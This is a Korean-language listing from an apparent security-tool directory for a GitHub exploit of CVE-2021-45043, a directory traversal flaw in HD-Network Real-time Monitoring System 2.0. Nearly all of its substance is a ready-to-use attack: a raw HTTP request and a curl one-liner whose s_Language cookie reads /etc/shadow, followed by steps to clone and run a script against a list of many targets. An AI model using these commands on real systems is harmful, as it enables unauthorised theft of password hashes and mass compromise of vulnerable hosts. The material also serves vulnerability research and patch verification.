Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2021-45043 — HD-Network 실시간 모니터링 시스템 2.0은 /language/lang s_Language 매개변수를 통해 ../ 디렉터리 트래버설을 허용하여 /etc/shadow를 읽을 수 있습니다. | Kitploit
도구/GitHubGitHub/crypt0g30rgy/cve-2021-45043
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcrypt0g30rgy/cve-2021-45043

cve-2021-45043

HD-Network 실시간 모니터링 시스템 2.0은 /language/lang s_Language 매개변수를 통해 ../ 디렉터리 트래버설을 허용하여 /etc/shadow를 읽을 수 있습니다.

저장소 보기
1114년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

cve-2021-45043

HD-Network 실시간 모니터링 시스템 2.0은 /language/lang s_Language 매개변수를 통해 ../ 디렉터리 트래버설을 허용하여 /etc/shadow를 읽을 수 있습니다.

최초 게시물

https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f

Burp를 통한 익스플로잇

GET /language/lang HTTP/1.1 Host: IP.target Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow

원라이너를 통한 익스플로잇

curl -k -s -H "Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow" -X GET http://IP.target/language/lang

대량 타깃 익스플로잇

git clone https://github.com/g30rgyth3d4rk/cve-2021-45043.git

cd cve-2021-45043/

chmod +x script.sh

./script.sh targets.txt

도구 다운로드